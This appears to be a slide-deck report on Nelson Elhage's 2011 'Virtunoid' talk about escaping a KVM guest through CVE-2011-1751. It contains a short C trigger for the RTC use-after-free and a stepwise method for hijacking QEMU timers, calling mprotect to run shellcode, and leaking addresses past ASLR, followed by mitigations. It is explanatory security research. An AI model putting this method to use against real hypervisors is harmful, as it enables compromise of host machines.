Virtunoid: Breaking out of KVM

Report
Nelson Elhage
Black Hat USA 2011
 Introduction
 Related work
 Background Knowledge
 Attack Detailed





CVE 2011-1751 Bug Detailed
Exploit Detailed (Take Control of %rip)
Inject Shellcode into host
Disable non executable page
Bypassing ASLR
 Conclusions
 Reference
 It was found that the PIIX4 Power Management
emulation layer in qemu-kvm did not properly check
for hot plug eligibility during device removals. A
privileged guest user could use this flaw to crash the
guest or, possibly, execute arbitrary code on the host.
(CVE-2011-1751)
 a generic and open source machine emulator and
virtualizer.
 Three components:
 Kvm.ko
 Kvm-intel.ko or kvm-amd.ko
 Qemu-kvm
 The core KVM kernel module
 Provides ioctls for communicating the kernel module
 Primarily responsible for emulating the virtual CPU
and MMU
 Emulates a few devices in-kernel for efficiency
 Contains an emulator for a subset of x86 used in
handling certain traps
 Provides support for Intel’s VMX and AMD’s SVM
virtualization extensions
 Relatively small compared to the rest of KVM
 Provides the most direct user interface to KVM
 Based on the classic x86 emulator
 Implements the bulk of the virtual devices a VM uses
 Implements a wide variety of possible devices and
buses
 An order of magnitude more code than the kernel
module
 Static QEMUTimer *active_timers[QEMU_NUM_CLOCKS]
 Struct QEMUTimer {
QEMUClock *clock;
int64_t expire_time;
QEMUTimerCB *cb;
/* call back function*/
void *opaque;
/* parameter */
struct QEMUTimer *next; /* link list */
}
Active_timers
QEMUTimer
 Related functions:
 Qemu_new_timer: allocate a memory region for the new
timer.
 Qemu_mod_timer: modify the current timer add it to link
list.
 Qemu_run_timers: loop through the link list and execute the
timer structure call back function with the opaque as the
parameter
 The main_loop_wait function will iterate through the
active_timers and call qemu_run_timers()
 A computer clock that keep track of the current time
 MC146818 RTC hardware manual can be found
 http://wiki.qemu.org/File:MC146818AS.pdf
 RTCState structure
Struct RTCState {
…..
QEMUTimer *second_timer;
QEMUTimer *second_timer2;
}
 Related functions:
 Rtc_initfn : initialize the RTC
 Rtc_update_second : update the expire time of the
QEMUTimer and add it to the link list.
 rtc_initfn :
RTCState *s = ….
s->second_timer = qemu_new_timer(rtc_clock,
rtc_updated_second, s)
s->second_timer2 = qemu_new_timer(rtc_clock, rtc_update_second2,
s)
qemu_mod_timer(s->second_timer2, s->next_second_time)
Active_timer
Rtc_update_second
………
Second_timer
Second_timer2
Cb
opaque
Next
Cb
opaque
Next
QEMUTimer
QEMUTimer
……….
………..
……….
……….
………..
……….
RTCState
Rtc_update_second2
 A south bridge chip.
 Default south bridge chip used by qemu-kvm
 Include ACPI, PCI-ISA, and an embeded MC146818 RTC.
 Support PCI device hotplug, write values to IO port
0xae08
 Qemu use qdev_free to emulate device hotplug.
 Certain devices don’t support device hotplug but qemu
didn’t check this.
 It should not be possible to unplug the ISA bridge
 KVM’s emulated RTC is not designed to be unplugged.
Did not check
The device can
Be unplug
or not
Being dealloc
Add the second timer
to link list.
 #include <sys/io.h>
 Int main(){



 }
iopl(3);
outl(2, 0xae08);
return 0;
Unplug RTC
Active_timer
Cb
opaque
Next
QEMUTimer
Rtc_update_second
………
Second_timer
RTCState
Cb
opaque
Next
……….
………..
……….
QEMUTimer
Unplug RTC
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
……
……
……
QEMUTimer
Rtc_update_second
……….
………..
……….
QEMUTimer
Dummy memory region
Return to main_loop_wait
Call qemu_run_timers
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
……
……
……
QEMUTimer
Rtc_update_second
……….
………..
……….
QEMUTimer
Dummy memory region
QEMUTimer call back
Rtc_update_second(opaque)
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
……
……
……
QEMUTimer
Rtc_update_second
……….
………..
……….
QEMUTimer
Dummy memory region
Next Main_loop_wait
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
……
……
……
QEMUTimer
Rtc_update_second
……….
………..
……….
QEMUTimer
Dummy memory region
 1. Inject a Controlled QEMUTimer into qemu-kvm
 2. Eject ISA bridge
 3. Force an allocation into the freed RTCState, with
second timer point to our fake QEMUTimer
 The guest RAM is backed by mmap()ed region inside
the qemu-kvm process.
 Allocate in the guest RAM and calculate the the host
address by the following formula:
 Hva = physmem_base + gpa
 gpa = page_traslation(gva) <= linux kernel project 1





Gva = guest virtual address
Gpa = guest physical address
Hva = host virtual address
Physmem_base = mmap start region
For now assume we know physmem_base(no aslr)
 Force qemu to call malloc
 Utilize the qemu-kvm user-mode networking stack
 Qemu-kvm implement DHCP server, DNS server and
NAT gateway in user-mode networking stack
 User-mode stack normally handle packets
synchronously
 To prevent recursion, if a second packet is emitted while
handling a first packet, the second packet is queued
using malloc.
 ICMP ping.
 1. Allocate a Fake QEMUTimer
 2. calculate the Fake timer address
 3. unplug ISA bridge
 4. ping the gateway containing pointers to your fake
timer.
Allocate Fake QMEUTimer
Active_timer
Cb
opaque
Next
QEMUTimer Rtc_update_secon
……….
………..
……….
………
Second_timer
RTCState
Cb
opaque
Next
Cb
opaque
Next
QEMUTimer
Fake QEMUTimer
Evil function
(Shellcode)
……….
………..
……….
Unplug ISA bridge
Ping the gateway
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
Cb
opaque
Next
QEMUTimer Rtc_update_secon
……….
………..
……….
QEMUTimer
Fake QEMUTimer
Evil function
(Shellcode)
……….
………..
……….
First Main_loop_wait
Active_timer
Cb
opaque
Next
Second_timer
RTCState
Cb
opaque
Next
Cb
opaque
Next
QEMUTimer Rtc_update_secon
……….
………..
……….
QEMUTimer
Fake QEMUTimer
Evil function
(Shellcode)
……….
………..
……….
Second Main_loop_wait
Active_timer
Cb
opaque
Next
QEMUTimer
Second_timer
RTCState
Evil function
(Shellcode)
Cb
opaque
Next
Fake QEMUTimer
……….
………..
……….
 1. we have %rip control
 2. Where is the Evil function
 Inject shellcode to host virtual memory
 Host virtual memory has page protection(NX bit)
 3. Solutions:
 A. ROP
 B. something clever
 1. we can control the QEMUTimer data structure.
 2. create multiple QEMUTimer object and chain them
together.
QEMUTimer
Cb
opaque
Next
Cb
opaque
Next
Cb
opaque
Next
……….
………..
……….
……….
………..
……….
……….
………..
……….
F1(X)
F2(Y)
F3(Z)
 We now have multiple on argument function calls.
 We want to do more arguments function calls. For
example, mprotect take three arguments.
 Arguments of types Bool, char, short, int, long, long long,
and pointers are in the INTEGER class.
 If the class is INTEGER, the next available register of the
sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9 is used
 More detailed check out the reference 7
 Suppose we can find a function with the following
property.
Set_rsi:
movl %rdi, %rsi;
return
 Let f1(x) be set_rsi
 %rsi register will not be modified during
qemu_run_timer() in most qemu version.
 Therefore, F2(y) becomes F2(y,x) since we control the
%rsi from f1(x)
Void cpu_outl(pio_addr_t addr, uint32_t val) {
ioport_write(2, addr, val);
}
 This function will copy its first parameter to the second
parameter of ioport_write
 %rdi is the first parameter and %rsi is the second
parameter. Therefore we get a function with the previous
property. (Movl %rdi, %rsi)
 Mprotect prototype:
 Mprotect(addr, lens, prot)
 PROT_EXEC = 4
 Use the following function
 We control the “opaque/ioport” by QEMUTimer and
control the “addr” by set_rsi()
 Seems like we control everything in this function
 Allocate a fake IORangeOps with
 fake_ops->read = mprotect
 Allocate a page-aligned IORange with
 Fake_ioport->ops = fake_ops
 Fake_ioport->base = -PAGE_SIZE
 Copy shellcode following the IORange
 Construct a timer chain that calls
 Cpu_outl(0, *)
 Ioport_readl_thunk(fake_ioport, 0)
 Fake_ioport + 1
mprotect
QEMUTimer Chain
Cb
opaque
Next
Cb
opaque
Next
…….
…….
…….
Cb
opaque
Next
ops
…….
…….
…….
…….
…….
…….
Read
Fill with
shellcode
IORangeOps
Cpu_outl
Ioport_readl_thunk
IORange (PAGE_ALIGN)
 The base address of the qemu-kvm binary, to find code
address(such as mprotect ….)
 Physmem_base, the address of the physical memory
mapping inside kvm
 Solutions:
 Find an information leak
 Assume non-PIE. Every major distribution compile qemu-
kvm as non position independent executable.
 How about physmem_base
 Emulated IO ports 0x510 (address) and 0x511 (data)
 Used to communicate various tables to the qemu BIOS
(e820 map, ACPI tables, etc)
 Also provides support for exporting writable tables to
the BIOS
 However, fw_cfg_write doesn’t check if the target table
is supposed to be writable
 Several fw_cfg areas are backed by statically-allocated
buffers.
 Net result: nearly 500 writable bytes inside static
variables.
 Mprotect needs a page-aligned address, so these aren’t
suitable for our shellcode
 We can construct fake timer chains in this space to
build a read4() primitive. (Create Information Leak)
 Follow pointers from static variables to find
physmem_base
 Proceed as before
 Sandbox qemu-kvm
 Build qemu-kvm as PIE
 Lazily mmap/mprotect guest RAM
 XOR-encode key function pointers
 More auditing and fuzzing of qemu-kvm
 VM breakouts aren’t magic
 Hypervisors are just as vulnerable as anything else
 Device drivers are the weak spot.
 [1] http://qemu.weilnetz.de/qemu-tech.html
 [2] http://qemu.weilnetz.de/doxygen/structRTCState.html
 [3] http://www.linuxinsight.com/files/kvm_whitepaper.pdf
 [4] https://www.ibm.com/developerworks/cn/linux/l-virtio/
 [5] http://smilejay.com/kvm_theory_practice/
 [6] http://www.linux-kvm.org/page/Documents
 [7] http://www.cs.tufts.edu/comp/40/readings/amd64-abi.pdf
 [8]http://linuxfromscratch.xtra-net.org/hlfs/view/unstable/glibc-
2.4/chapter02/pie.html
 qemu source code

similar documents